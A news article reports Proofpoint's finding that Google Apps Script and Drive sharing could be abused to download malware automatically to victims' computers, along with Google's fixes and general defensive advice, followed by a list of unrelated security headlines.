Story image

SaaS platforms - The new Wild West of malware

09 Jan 18

Proofpoint researchers have identified a vulnerability that allows attackers to leverage Google Apps Script to automatically download arbitrary malware hosted in Google Drive to a victim's computer. 

Google Apps Script is a development platform based on JavaScript that allows both the creation of standalone web apps and powerful extensions to various elements of the Google Apps SaaS ecosystem. 

Proofpoint research has found that Google Apps Script and the normal document sharing capabilities built into Google Apps supported automatic malware downloads and sophisticated social engineering schemes designed to convince recipients to execute the malware once it has been downloaded. 

Proofpoint also confirmed that it was possible to trigger exploits with this type of attack without user interaction, making it more urgent that organisations mitigated these threats before they reach end users, whenever possible.

Proofpoint's exploit begun by uploading malicious files or malware executables on Google Drive, to which threat actors could create a public link. 

Actors could then share an arbitrary Google Doc to be used as a lure and vehicle for a Google Apps Script that delivers the shared malware.

While Proofpoint frequently observes Google Docs phishing and malware distribution via links to Google Drive URLs, extensible SaaS platforms allow greater degrees of sophistication, malware propagation, and automation that are also much more difficult to detect. 

In this approach, because recipients received a legitimate link to edit a Google Doc -- as many people do on a daily basis -- the old rules of email hygiene apply here as much as ever. 

Google has imposed new restrictions on simple triggers to block phishing and malware distribution attempts that are triggered by opening a doc. 

However, recipients also should exercise caution clicking even links to Google Docs unless they know or can verify the sender. 

Moreover, this vulnerability automatically downloaded a malicious file and relied on social engineering to convince the recipient to open it; users should be wary of files automatically downloaded by web-based or SaaS platforms and be cognizant of the anatomy of a social engineering attack while organisations should focus on mitigating these threats before they reach end users if possible.

Since Proofpoint disclosed this vulnerability to Google, the company has added specific restrictions on certain Apps Script events that could potentially be abused. 

Google now blocks both installable triggers -- customisable events that cause certain events to occur automatically -- and simple triggers like onOpen and onEdit from presenting custom interfaces in Docs editors in another user’s session. 

However, the proof of concept Proofpoint provided to Google and recently presented at the DeepSec Conference demonstrates the ability of threat actors to use extensible SaaS platforms to deliver malware to unsuspecting victims in even more powerful ways than they have with Microsoft Office macros over the last several years. 

Moreover, the limited number of defensive tools available to organisations and individuals against this type of threat makes it likely that threat actors will attempt to abuse and exploit these platforms more often as we become more adept at protecting against macro-based threats.

SaaS platforms remain a “Wild West” for threat actors and defenders alike.

New tools like Google Apps Script are rapidly adding functionality while threat actors look for novel ways of abusing these platforms.

At the same time, few tools exist that can detect threats generated by or distributed via legitimate software-as-a-service (SaaS) platforms.

This creates considerable opportunities for threat actors who can leverage newfound vulnerabilities or use “good for bad”: making use of legitimate features for malicious purposes.

With malicious Microsoft Office macros, threat actors introduced layers of obfuscation, new techniques, and innovative approaches designed to better deliver malware payloads.

The same level of innovation is likely as SaaS applications become increasingly mainstream and threat actors become more sophisticated in their abuse of these tools.

Organisations will need to apply a combination of SaaS application security, end-user education, endpoint security, and email gateway security to stay ahead of the curve of this emerging threat.

Hillstone CTO's 2019 security predictions
Hillstone Networks CTO Tim Liu shares what key developments could be expected in the areas of security compliance, cloud, security, AI and IoT.
Can it be trusted? Huawei’s founder speaks out
Ren Zhengfei spoke candidly in a recent media roundtable about security, 5G, his daughter’s detainment, the USA, and the West’s perception of Huawei.
Oracle Java Card update boosts security for IoT devices
"Java Card 3.1 is very significant to the Internet of Things, bringing interoperability, security and flexibility to a fast-growing market currently lacking high-security and flexible edge security solutions."
Sophos hires ex-McAfee SVP Gavin Struther
After 16 years as the APAC senior vice president and president for McAfee, Struthers is now heading the APJ arm of Sophos.
Half of companies unable to detect IoT device breaches
A Gemalto study also shows that the of blockchain technology to help secure IoT data, services and devices has doubled in a year.
Huawei founder publically denies spying allegations
“After all the evidence is made public, we will rely on the justice system.”
Malware downloader on the rise in Check Point’s latest Threat Index
Organisations continue to be targeted by cryptominers, despite an overall drop in value across all cryptocurrencies in 2018.
IoT breaches: Nearly half of businesses still can’t detect them
The Internet of Thing’s (IoT’s) rapid rise to prominence may have compromised its security, if a new report from Gemalto is anything to go by.